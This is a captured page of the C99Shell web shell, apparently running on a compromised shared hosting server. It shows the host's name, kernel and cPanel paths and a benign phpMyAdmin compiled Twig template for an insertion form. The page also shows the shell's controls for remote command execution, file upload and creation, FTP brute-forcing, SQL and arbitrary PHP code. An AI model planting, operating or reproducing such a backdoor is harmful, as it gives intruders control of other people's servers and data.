!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/tmp/pma_template_compiles_memoriacel/twig/73/   drwxr-xr-x
Free 986.65 GB of 1859.98 GB (53.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     73ee99e209023ff62597f3f6e5f027a498c1261e4d35d310b0d0a2664f3c2c0d.php (4.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use Twig\Environment;
use 
Twig\Error\LoaderError;
use 
Twig\Error\RuntimeError;
use 
Twig\Markup;
use 
Twig\Sandbox\SecurityError;
use 
Twig\Sandbox\SecurityNotAllowedTagError;
use 
Twig\Sandbox\SecurityNotAllowedFilterError;
use 
Twig\Sandbox\SecurityNotAllowedFunctionError;
use 
Twig\Source;
use 
Twig\Template;

/* table/insert/continue_insertion_form.twig */
class __TwigTemplate_29af82c0e4f633dcf609767cb5e0cec017e841d8319051b9a6d2bb998728730a extends \Twig\Template
{
    public function 
__construct(Environment $env)
    {
        
parent::__construct($env);

        
$this->parent false;

        
$this->blocks = [
        ];
    }

    protected function 
doDisplay(array $context, array $blocks = [])
    {
        
// line 1
        
echo "<form id=\"continueForm\" method=\"post\" action=\"tbl_replace.php\" name=\"continueForm\">
    "
;
        
// line 2
        
echo PhpMyAdmin\Url::getHiddenInputs(($context["db"] ?? null), ($context["table"] ?? null));
        echo 
"
    <input type=\"hidden\" name=\"goto\" value=\""
;
        
// line 3
        
echo twig_escape_filter($this->env, ($context["goto"] ?? null), "html"nulltrue);
        echo 
"\">
    <input type=\"hidden\" name=\"err_url\" value=\""
;
        
// line 4
        
echo twig_escape_filter($this->env, ($context["err_url"] ?? null), "html"nulltrue);
        echo 
"\">
    <input type=\"hidden\" name=\"sql_query\" value=\""
;
        
// line 5
        
echo twig_escape_filter($this->env, ($context["sql_query"] ?? null), "html"nulltrue);
        echo 
"\">

    "
;
        
// line 7
        
if (($context["has_where_clause"] ?? null)) {
            
// line 8
            
echo "        ";
            
$context['_parent'] = $context;
            
$context['_seq'] = twig_ensure_traversable(($context["where_clause_array"] ?? null));
            foreach (
$context['_seq'] as $context["key_id"] => $context["where_clause"]) {
                
// line 9
                
echo "            <input type=\"hidden\" name=\"where_clause[";
                echo 
twig_escape_filter($this->env$context["key_id"], "html"nulltrue);
                echo 
"]\" value=\"";
                
// line 10
                
echo twig_escape_filter($this->envtwig_trim_filter($context["where_clause"]), "html"nulltrue);
                echo 
"\">
        "
;
            }
            
$_parent $context['_parent'];
            unset(
$context['_seq'], $context['_iterated'], $context['key_id'], $context['where_clause'], $context['_parent'], $context['loop']);
            
$context array_intersect_key($context$_parent) + $_parent;
            
// line 12
            
echo "    ";
        }
        
// line 13
        
echo "
    "
;
        
// line 14
        
ob_start(function () { return ''; });
        
// line 15
        
echo "        <input type=\"number\" name=\"insert_rows\" id=\"insert_rows\" value=\"";
        
// line 16
        
echo twig_escape_filter($this->env, ($context["insert_rows_default"] ?? null), "html"nulltrue);
        echo 
"\" min=\"1\">
    "
;
        
$context["insert_rows"] = ('' === $tmp ob_get_clean()) ? '' : new Markup($tmp$this->env->getCharset());
        
// line 18
        
echo "    ";
        echo 
sprintf(_gettext("Continue insertion with %s rows"), ($context["insert_rows"] ?? null));
        echo 
"
</form>
"
;
    }

    public function 
getTemplateName()
    {
        return 
"table/insert/continue_insertion_form.twig";
    }

    public function 
isTraitable()
    {
        return 
false;
    }

    public function 
getDebugInfo()
    {
        return array (  
84 => 18,  79 => 16,  77 => 15,  75 => 14,  72 => 13,  69 => 12,  61 => 10,  57 => 9,  52 => 8,  50 => 7,  45 => 5,  41 => 4,  37 => 3,  33 => 2,  30 => 1,);
    }

    
/** @deprecated since 1.27 (to be removed in 2.0). Use getSourceContext() instead */
    
public function getSource()
    {
        @
trigger_error('The '.__METHOD__.' method is deprecated since version 1.27 and will be removed in 2.0. Use getSourceContext() instead.'E_USER_DEPRECATED);

        return 
$this->getSourceContext()->getCode();
    }

    public function 
getSourceContext()
    {
        return new 
Source("""table/insert/continue_insertion_form.twig""/usr/local/cpanel/base/3rdparty/phpMyAdmin/templates/table/insert/continue_insertion_form.twig");
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.3347 ]--